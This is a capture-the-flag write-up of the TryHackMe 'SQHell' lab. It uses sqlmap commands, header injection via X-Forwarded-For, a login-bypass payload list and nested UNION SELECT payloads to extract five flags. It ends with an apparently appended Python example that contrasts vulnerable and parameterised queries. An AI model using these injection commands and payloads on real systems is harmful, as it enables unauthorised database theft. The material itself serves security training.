SQHell — TryHackMe

Bat_09
Jun 29, 2021

Let's start with enumeration, using Nmap to find the open ports and services.

sudo nmap -A <target-ip>

There are two open ports, 22 and 80. Let's look for hidden directories using Gobuster.

sudo gobuster dir -u http://<target-ip>/ -w /usr/share/wordlists/dirb/common.txt -x php,html

Nothing much more to enumerate here. On the website, the id parameter under the post directory seems vulnerable to SQL injection, so let's use sqlmap to find the vulnerabilities.

sudo sqlmap -u "http://<target_ip>/post/?id=2" --dbs

From this we learn about the database "sqhell_5". Now intercept the request with Burp Suite and save it to a file. Let's dump the data in that database; the hint already gives us the table name, 'flag'.

sudo sqlmap -r req --dbms=MySQL -D sqhell_5 -T flag --dump --threads 10

After running this we are able to extract flag5, but not the other flags, so let's try to find the others.

Heading to the login panel, I tried the default credentials but didn't get past it, so let's try SQL injection on the username. Intercept the request and send it to Intruder, load the payload list (I used this one from GitHub) and set the payload position to the username field only.

Tick the "URL-encode these characters" option. After running Intruder we are able to get into the admin panel.

Send the request, and flag1 appears in the response.

Now looking at the register panel: whatever we try, it keeps alerting that registrations are no longer available. Intercepting the request, we see a username parameter. The ?user-check endpoint seems vulnerable to SQL injection; running sqlmap again we learn about the database 'sqhell_3'. Save the request to a file and let's extract the flag.

sudo sqlmap -r register --dbms=MySQL -D sqhell_3 -T flag --dump

We got flag3; we still need flag2 and flag4. The hint for flag2, in the terms and conditions (iii: "We log your IP address for analytics purposes"), seems useful: the site logs the IP addresses of users connecting to the website, taken from the HTTP header X-Forwarded-For, so let's exploit this. After running sqlmap we learn about the sqhell_1 database.

sudo sqlmap --dbms mysql --headers="X-Forwarded-For: 1*" -u http://<target_ip>/ -D sqhell_1 -T flag --dump

Well, we got flag2; now only flag4 is left. We have looked at every directory except users/?id, so let's check whether the flag is there. At first the id parameter seemed vulnerable, but using sqlmap I was unable to get the flag. The hint says "Well, dreams, they feel real while we're in them, right?", which is from the movie Inception. Modifying the request, we were able to change the database.

http://<target_ip>/user?id=2 union all select 1,4,5 from users#

Now we need to fetch the flag using this:

http://<target_ip>/user?id=2 union all select "1 union select 1,flag,4,5 from flag -- -",1,2 from users#

Successfully retrieved flag4 and completed the challenge!
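To see why the /user?id= lookup and the X-Forwarded-For logging behind flag2 are injectable, and what the fix looks like, here is an added Python example (not from the write-up or the SQHell room) that models both patterns against an in-memory sqlite3 database; the table and column names and the sample flag value are assumptions.

```python
import sqlite3

def make_db():
    # Constructed in-memory stand-in for the challenge's MySQL schema; the table
    # and column names and the flag value are assumptions, not taken from the room.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users(id INTEGER, username TEXT, email TEXT);
        CREATE TABLE flag(id INTEGER, flag TEXT);
        CREATE TABLE ip_log(ip TEXT);
        INSERT INTO users VALUES (1, 'admin', 'admin@example.test'),
                                 (2, 'bob', 'bob@example.test');
        INSERT INTO flag VALUES (1, 'THM{constructed_sample_flag}');
    """)
    return db

def lookup_user_vulnerable(db, user_id):
    # The /user?id= pattern: the query-string value is pasted into the SQL text,
    # so a UNION appended to it runs as part of the statement.
    return db.execute(
        "SELECT id, username, email FROM users WHERE id = " + user_id).fetchall()

def lookup_user_safe(db, user_id):
    # Hardened: validate the type, then bind the value; it can never become SQL.
    try:
        uid = int(user_id)
    except ValueError:
        return []
    return db.execute(
        "SELECT id, username, email FROM users WHERE id = ?", (uid,)).fetchall()

def log_client_ip_vulnerable(db, xff):
    # The flag2 pattern: X-Forwarded-For concatenated into an INSERT. A single
    # quote in the header breaks the statement; that error is what a probe such
    # as sqlmap --headers looks for. Returns False when the statement is malformed.
    try:
        db.execute("INSERT INTO ip_log VALUES ('" + xff + "')")
        db.commit()
        return True
    except sqlite3.OperationalError:
        return False

def log_client_ip_safe(db, xff):
    # Hardened: the header is bound as data and stored verbatim, quotes and all.
    db.execute("INSERT INTO ip_log VALUES (?)", (xff,))
    db.commit()
    return db.execute("SELECT ip FROM ip_log ORDER BY rowid").fetchall()
```

The parameterised versions return nothing for the UNION text and store the quoted header value as an ordinary string, which is the behaviour the room's endpoints should have had.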

Thank You!!

Happy Hacking!! 👻
